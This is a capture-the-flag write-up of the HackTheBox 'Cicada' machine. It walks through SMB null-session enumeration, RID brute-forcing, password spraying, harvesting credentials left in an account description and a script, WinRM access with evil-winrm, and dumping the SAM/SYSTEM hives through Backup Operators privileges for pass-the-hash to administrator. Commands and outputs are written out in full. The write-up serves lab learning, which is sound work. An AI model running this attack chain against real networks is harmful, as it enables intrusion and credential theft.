HackTheBox | Cicada
In this writeup, I demonstrate how to gain administrator level access to Cicada on HackTheBox.
Hack The Box
Reconnaissance
Started off with an Nmap scan and specified the following options:
-sCto use default scripts-sVto gather service/version information-oAto save the output to a file-p-to scan all TCP ports
The scan results suggest that the host is Windows-based. It is running SMB on TCP ports 139 and 445. It also runs LDAP/LDAPS and Kerberos on TCP ports 389/636 and 88, respectively. These services are usually seen on domain controllers. Finally, WinRM is also running on TCP port 5985.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ sudo nmap -sC -sV -oA nmap/full.tcp -p- 10.129.82.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 14:01 CST
Nmap scan report for 10.129.82.46
Host is up (0.0080s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-23 03:03:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2024-11-23T03:04:24
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 231.74 seconds
Initial Access
Abusing Null Sessions and Poor Password Policies
To gather more information about the system, I ran the following command. The command results revealed that the system supports null sessions, but RPC queries for users/groups were denied. Considering that, it was time to pivot to shares and enumerate those. A couple of non-standard shares looked promising, but only one could have the contents of its directory listed. That share had a fascinating text document.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A 10.129.82.46
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass -L 10.129.82.46
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.82.46 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass //10.129.82.46/DEV
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass //10.129.82.46/HR
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 430240 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (35.3 KiloBytes/sec) (average 35.3 KiloBytes/sec)
smb: \> exitThe text document is related to the company's onboarding process and contains directions for employees accessing their accounts using a default password. And like any good company with proper security protocols, it directs its employees to change their passwords to something unique after logging in for the first time. Indeed, all the employees followed the directions, so a password-spraying attack would not work or will it?
I generated a list of usernames by performing RID brute-forcing via netexec and selected user SIDs only. With a password and a list of usernames, it was time to spray and pray. Just like that, I discovered valid user credentials. I did not know what type of access michael.wrightson had. Because of that, it is good practice to go back to the enumeration phase and see what new information can be gathered from the environment. Fortunately, michael.wrightson can query users/groups via RPC. In the description field for david.orelious is his password, just in case he forgets it. I enumerated the system again with david.orelious's credentials. It turns he has access to the DEV share. On that share was a PowerShell script with hard-coded credentials for emily.oscars.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser"
SMB 10.129.82.46 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser" \
> | cut -d \'\' -f2 | cut -d '(' -f1
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -d CICADA -p pw.txt -u users.txt | egrep '\+' | cut -d ":" -f1
SMB 10.129.82.46 445 CICADA-DC [+] CICADA\michael.wrightson
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A -u michael.wrightson -p $(cat pw.txt) 10.129.82.46
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A -u david.orelious -p $(cat pw.txt) 10.129.82.46
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient -U CICADA/david.orelious%"$(cat pw.txt)" //10.129.82.46/Dev
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 07:31:39 2024
.. D 0 Thu Mar 14 07:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024
4168447 blocks of size 4096. 427257 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (17.3 KiloBytes/sec) (average 17.3 KiloBytes/sec)
smb: \> exitBased on the backup script, I assumed emily.oscars is a system administrator. Sometimes, system administrators need to access remote hosts. There are many tools out there that provide this type of functionality. In a Windows environment, however, there is a native tool that allows system administrators to access and control devices remotely. That tool is known as PowerShell remoting, which relies on WinRM. During my initial enumeration of the target system, it showed that the WinRM service was running on TCP port 5985. Utilizing the credentials from the PowerShell script, it was possible to get code execution on the target.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ evil-winrm -i 10.129.82.46 -u emily.oscars -p $(cat pw.txt)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DCPrivilege Escalation
Abusing Group Membership Permissions
With a foothold established on the target system, I started to gain some situational awareness. After doing so, one might notice that the user emily.oscars is part of a unique group - BUILTIN\Backup Operators.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
...SNIP...
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
...SNIP...
Being a member of the BUILTIN\Backup Operators group and enabling the SeBackupPrivilege allows a user to create a backup of ANY file on the host. With that in mind, it is possible to back up the SAM and SYSTEM hives and extract credentials for local system accounts.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir
Directory: C:\Users\emily.oscars.CICADA\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/23/2024 2:21 AM 49152 sam
-a---- 11/23/2024 2:21 AM 18558976 system
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
With the local Administrator's hash in hand, it is possible to use WinRM and elevate privileges.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ ls -latr sam system
-rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 49152 Nov 22 21:21 sam
-rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 18558976 Nov 22 21:22 system
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ evil-winrm -i 10.129.82.46 -u administrator -H $(cat admin_hash.txt)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
References
- Windows Server Over and Port Requirements - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/service-overview-and-network-port-requirements
- Backup Operator Privilege Escalation - https://www.bordergate.co.uk/backup-operator-privilege-escalation/